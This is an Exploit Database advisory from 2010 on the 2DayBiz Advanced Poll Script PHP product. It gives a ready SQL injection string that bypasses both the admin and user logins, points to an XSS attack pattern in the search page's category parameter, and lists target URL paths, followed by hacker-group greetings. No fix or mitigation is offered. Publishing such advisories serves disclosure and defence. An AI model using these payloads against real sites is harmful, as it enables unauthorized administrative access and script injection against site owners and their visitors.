2DayBiz Advanced Poll Script – Cross-Site Scripting / Authentication Bypass

• Exploit Database
• 11 阅读

• 作者： Sid3^effects
  日期： 2010-04-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12395/

• ______________________________________________________________________________
   XSS and Authentication bypass in Advanced Poll Script
  Vendor:http://www.2daybiz.com/___________________________Author:Sid3^effects_________________________________
  
  
  Description :
  
  Advanced Poll is a polling system with powerful administration tool supports both text file and MySQL database. Its features include multiple polls, unlimited options, IP-Logging, IP-Locking, cookie support, comment feature, vote expire feature, and random poll support. 
  
  script cost :$140
  ---------------------------------------------------------------------------
  * Authentication bypass:
  
  The following script has authentication bypass in the admin login as well as in user login 
  
  use ' or 1=1 or ''=' in both login and password.
  
  user logindemo :http://server/polls/login.php
  admin login demo: http://server/polls/admin/
  ---------------------------------------------------------------------------
  * XSS (cross site scripting ) :
   
  XSS is also found in the search field. 
  
  
   Attack Pattern: '"--> 
  
   DEMO:http://server/polls/index_search.php?category= [XSS]
  ---------------------------------------------------------------------------
  
  ShoutZ :
  ------- 
   ---Indian Cyber warriors--Andhra hackers-- 
  
  Greetz :
  --------
   ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MayUr--